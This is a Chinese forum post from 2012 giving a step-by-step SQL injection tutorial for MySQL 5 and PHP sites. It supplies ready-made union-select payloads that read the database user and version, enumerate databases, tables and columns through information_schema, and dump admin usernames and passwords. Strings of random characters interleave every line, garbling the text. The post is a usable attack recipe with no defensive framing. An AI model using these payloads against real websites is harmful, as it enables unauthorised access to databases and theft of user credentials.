7 I U! V3 S4 F; Y教程内容:Mysql 5+php 注入0 f% {4 r, ?- h3 r. m8 R) U1 C
" G) |# V+ q6 V% G/ l$ G5 A6 u8 P! E5 B
3 z4 u0 w" F( B# R w
一.查看MYSQL基本信息(库名,版本,用户)' U6 h$ q# o& L' k( m% \8 q, A
9 _ m* Q& p; q& ?and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*. U- V/ S/ V3 i* ]- C
4 K' `- C% c9 K e. t3 Z二.查数据库2 X/ T9 M0 K5 b& v- o) @, L% |9 \* {
) U: f" h( w% z' b( l7 J
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
& ]- h7 k' S* S" xlimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
" g9 K; ]& w" U2 z
$ I- W1 E: x+ K三.暴表
8 x G- w# r- A3 G5 m( M
9 }4 j6 Q6 y/ _and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*9 [1 j: N( {0 T7 A
1 S" A- B- V P9 v1 R# w! H. Glimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
& \; c( N1 r# }# l. P2 F9 B- Y' U
3 d `9 Y: p% j8 l, f) @3 u( ~四.暴字段) P& S, o. L7 r% j2 b ~4 Q
, J. c7 Z1 v# y& |. N
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*9 v- V! Y- D, b
( W" v6 B+ J6 Z4 Q1 F9 u8 d# Klimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。$ W- }. o0 z) _
+ v) a0 @- a2 G+ i: `+ k$ }
五.暴数据- ]6 P8 ]$ [! r8 f/ i% s9 F
/ Y0 U4 w) w& q7 G8 m
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*4 W7 `) K' f7 g( j! J6 x8 G
' }: D6 w& g' K$ G- L
( }% |' z$ U8 U( X这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
- N' \5 F* ]# z2 l. t3 T% z# W! _8 q- t |
发表于 2012-9-13 16:27:53
收藏
支持
反对